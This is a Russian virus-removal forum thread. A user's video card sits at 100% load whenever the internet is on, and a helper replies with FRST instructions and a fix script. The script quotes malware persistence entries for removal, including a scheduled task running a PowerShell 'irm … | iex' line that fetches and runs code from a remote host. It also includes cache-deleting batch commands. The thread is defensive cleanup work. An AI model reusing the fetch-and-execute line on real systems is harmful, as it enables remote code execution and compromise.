Здравствуйте. Недавно обнаружил что видео карта постоянно нагружена на 100 процентов. Как только отключаю интернет, нагрузка падает. Заранее спасибо за помощь.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Filviktor, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.
Нажмите кнопку Сканировать.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Выделите и скопируйте в буфер обмена следующий код:
Код:
Start::
CloseProcesses:
HKLM\...\Run: [Win AIH Service] => C:\ProgramData\WinAIHService\WinAIHService.exe [311296 2025-06-28] () [File not signed]
Task: {7037890B-B1BD-41B1-968C-3E4403A752BC} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-13] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ATTENTION
HKU\S-1-5-21-108240752-3943798192-2182586631-1001\...\MountPoints2: {45592ac8-61b4-11ef-a6dc-4c034fe5b0c2} - "D:\setup.exe"
2025-06-29 08:23 - 2025-05-08 20:28 - 000000000 ____D C:\ProgramData\WinAIHService
FirewallRules: [UDP Query User{EA3471DC-ABDC-4AA8-AF2E-632689CF1195}C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Block) C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [TCP Query User{7066FE61-F93B-404D-AB78-ABC04115B1EC}C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Block) C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [{6FB4212F-CECC-40CA-90BB-DABBAD367BD3}] => (Block) %APPDATA%\Movavi Video Editor Plus 2022\VideoEditorPlus.exe => No File
FirewallRules: [UDP Query User{CFB8B896-66D6-4344-88BF-DD5D1D25AB0D}C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [TCP Query User{FC7FAECA-53C9-4B90-A2DE-EF9E1DFE5BD7}C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [{4E725FAB-AFD8-4136-8478-641432B7F806}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe => No File
FirewallRules: [{06EBE987-7CFD-49DF-B55C-F65210CDB009}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe => No File
FirewallRules: [{47cda63b-dfa1-459b-ab8a-e01d8b4a5d99}] => (Allow) C:\ProgramData\WinAIHService\WinAIHService.exe () [File not signed]
FirewallRules: [{6de73cd3-816b-4f53-834f-a0a8c4708b55}] => (Allow) C:\ProgramData\WinAIHService\WinAIHService.exe () [File not signed]
FirewallRules: [{230bd764-dd9d-4c06-8025-5bed1ce6ec89}] => (Allow) C:\ProgramData\WinAIHService\WinAIHService.exe () [File not signed]
FirewallRules: [{b7738539-3724-444f-b56e-c17ac2b92066}] => (Allow) C:\ProgramData\WinAIHService\WinAIHService.exe () [File not signed]
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
StartBatch:
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Js\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Opera Software\Opera Stable\Default\Cache\Cache_Data\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\Js\*.*" >nul
del /s /q C:\Windows\Temp\*.* >nul
del /s /q "%userprofile%\AppData\Local\temp\*.*" >nul
del /s /q C:\Windows\Minidump\*.dmp >nul
ipconfig /flushdns
sfc /scannow
endbatch:
CreateRestorePoint:
Reboot:
End::
Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Вставлять код никуда не нужно, программа возьмёт его из буфера обмена. Будет создан лог-файл (Fixlog.txt), прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен.